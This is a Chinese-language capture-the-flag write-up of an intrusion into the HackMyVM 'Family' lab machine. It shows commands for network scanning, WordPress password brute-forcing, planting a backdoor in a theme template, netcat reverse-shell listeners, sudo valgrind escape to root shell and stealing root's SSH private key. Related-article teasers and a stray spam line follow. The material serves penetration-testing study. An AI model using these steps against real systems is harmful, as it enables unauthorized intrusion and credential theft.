<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    靶場學習 | 記一次對Family靶機的滲透測試

    VSole2022-04-04 17:09:04

    靶機信息

    靶機地址:https://hackmyvm.eu/machines/machine.php?vm=Family
    

    名稱:(家庭)

    難度:中等

    創作者:cromiphi

    發布日期:2021-04-30

    目標:user.txt和falg.txt,root權限

    搭建靶機

    下載完Family.ova后,使用Oracle VM VirtualBox導入即可

    導入時注意!!不要勾上USB控制器,不然會出錯

    導入完成后,直接啟動即可,就可以開始靶機之旅

    實驗環境

    攻擊機:VMware  Kali 192.168.31.185
    目標機:VirtualBox Debian IP自動獲取
    

    信息收集

    掃描局域網內的靶機IP地址

    nmap -sn 192.168.31.0/24
    

    端口掃描,掃描目標機器所開放的服務

    nmap -A -p- 192.168.31.214
    

    掃描到22(SSH)、80(HTTP)兩個端口,使用火狐瀏覽器訪問80端口,http://192.168.2.214

    是個wordpress,繼續訪問http://192.168.31.214/wordpress/,右擊查看源碼

    本機加個family的hosts再繼續訪問

    目錄掃描,掃描一些敏感文件之類的,使用gobuster來掃描

    gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150
    

    滲透測試

    使用 wpscan 掃描 wordpress,沒有發現可用的

    wpscan --url http://family/wordpress/
    

    使用 wpscan來爆破用戶名

    wpscan --url http://family/wordpress/ --enumerate u
    

    發現一個admin

    使用 wpscan來爆破admin用戶的密碼

    wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin
    

    訪問http://family/wordpress/wp-login.php,輸入賬號密碼,登錄后臺

    通過修改模板寫入后門,訪問文件即可獲取反彈shell

    訪問404頁面http://family/wordpress/wp-content/themes/twentytwentyone/404.php

    新開一個終端頁面開啟監聽

    nc -lvnp 6666
    

    檢查home,發現有3個用戶

    繼續尋找一些有用的資源,發現了father用戶的密碼

    新開一個終端頁面來登錄father用戶

    ssh father@192.168.31.214
    id
    cd /home
    ls -al
    

    發現/home/mother 屬于組father

    上傳pspy64來查看進程

    wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
    chmod +x pspy64
    ./pspy64
    

    發現/bin/sh -c python ~/check.py每一分鐘就執行一次

    這樣就可以在 /home/mother/check.py 中編寫一些反向shell代碼,等一分鐘后就可以得到mother用戶的反向shell

    新開一個終端頁面開啟監聽

    nc -lvnp 5555
    

    檢查用戶mother用戶的權限,發現可以以用戶baby運行二進制valgrind

    sudo -l
    

    執行以下命令,得到baby用戶的shell

    sudo -u baby valgrind /bin/bash
    /bin/bash -i
    

    拿到user.txt的flag

    再次檢查baby用戶的權限

    sudo -l
    

    查看root的ssh密鑰

    sudo cat /root/.ssh/id_rsa
    

    將ssh密鑰保存下來,通過ssh密鑰來提權

    新開一個終端頁面來登錄root

    chmod 600 id_rsa
    ssh -i id_rsa root@192.168.31.214
    

    發現一登錄就會退出,因為 /root/.ssh/authorized_keys 執行 /root/troll.sh,它就會立即退出

    現在要使shell代碼不退出,需要將終端尺寸變小,使“more”無法顯示全部信息再通過!/bin/bash來轉義

    ssh -i id_rsa root@192.168.31.214
    !/bin/bash
    

    成功獲取到root權限,拿到flag

    聲明:請勿用作違法用途,請在授權情況下使用
    
    ssh滲透測試
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    滲透測試中,拿到 webshell 后執行命令總會碰到很多不便,而使用 ssh 登錄則會方便許多。相比使用 webshell 工具執行命令,ssh 連接可以有命令提示、路徑補全、支持二次交互等優勢,本文記錄一個從 WEB RCE 漏洞到 SSH 登錄的姿勢。
    DeepExploit 是一種基于強化學習的自動化滲透框架,號稱能夠進行高效滲透,本文對該工具進行了分析并給出改進方向 本部分對DE(將DeepExploit簡稱為DE)利用到的核心工具做簡單介紹,分為metasploit介紹和強化學習算法介紹,均為入門介紹,熟悉的讀者可自行忽略。
    從 RCE 到 SSH 登錄
    getshell滲透測試
    2021-10-08 07:17:58
    隨著攻防演練愈演愈烈,弱小的我也不得不加入攻防大軍的隊伍里,而本篇文章就記錄了某次攻防演練中的getshell歷程。在這次攻防演練中,初步利用工具批量打點無果,作為團隊里卑微的撕口子工具人,只能選擇一個站一個站硬啃。
    旨在確定組織的用戶群對魚叉式網絡釣魚攻擊的敏感性。這些評估的結果可以用于增強組織的反社會工程意識計劃。在此評估類型中,測試人員會將部署看似普通的USB驅動器,并誘使用戶將該設備插入公司系統。在此評估期間,組織通常會向測試人員提供憑據訪問權限,以審查整個應用程序。這類測試通常會在安全團隊大多數成員完全不知情的情況下執行。紅藍對抗測試有多種形式。有時藍隊被告知模擬或滲透測試的時間,有時則完全不知情。
    一、工具介紹目前共能主要有:1、探活2、服務掃描3、poc探測4、數據庫等弱口令爆破5、內網常見漏洞利用6、常見組件及常見HTTP請求頭的log4j漏洞檢測 image7、非常規端口的服務掃描和利用8、識別為公網IP時, 從fofa檢索可用的資產作為掃描的補充(正在寫)9、自動識別簡單web頁面的輸入框,用于弱口令爆破及log4j的檢測(正在寫)二、安裝與使用1、快速使用sudo ./nacs -h IP或IP段 -o result.txt
    當你所掌握到的信息比別人多且更詳細的時候那么你就占據了先機超級掃描支持范圍掃描。支持活躍網段,主機。1)快速使用弱口令、指紋發現:df -ip 192.168.1.1-192.168.1.2. INFO[0000] 已加載1個IP,共計1個端口,啟動每IP掃描端口線程數128,同時可同時檢測IP數量32. INFO[0000] Plugins::netbios snmp postgres redis smb web memcached mssql mysql ftp mongodb ssh. 當前為非管理權限模式,請切換管理員運行。如果不具備管理員權限需要設置原生的命令檢測。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类